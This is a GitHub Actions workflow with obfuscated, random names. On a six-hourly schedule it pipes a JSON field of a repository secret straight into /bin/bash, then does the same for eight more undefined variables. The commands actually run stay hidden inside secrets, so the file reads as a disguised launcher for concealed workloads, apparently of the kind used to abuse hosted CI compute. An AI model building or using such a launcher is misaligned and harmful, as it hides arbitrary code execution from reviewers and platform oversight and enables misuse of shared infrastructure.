name: miaoguojing1997
on:
  workflow_dispatch:
  schedule:
    - cron: '0 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: miaoguojing1997
        env:
          fz884: ${{ secrets.fz884 }}
        run: |
          echo $fz884 | jq -r .ebp9 | /bin/bash
          echo $flgo881 | jq -r .rugoi6607 | /bin/bash
          echo $bcaha014 | jq -r .t5696 | /bin/bash
          echo $ybnlj68335 | jq -r .zy766 | /bin/bash
          echo $dog3432 | jq -r .x88 | /bin/bash
          echo $r6 | jq -r .apgf425 | /bin/bash
          echo $sfve946 | jq -r .voxnc19 | /bin/bash
          echo $f5 | jq -r .xe7 | /bin/bash
          echo $uuuaa978 | jq -r .uc0428 | /bin/bash

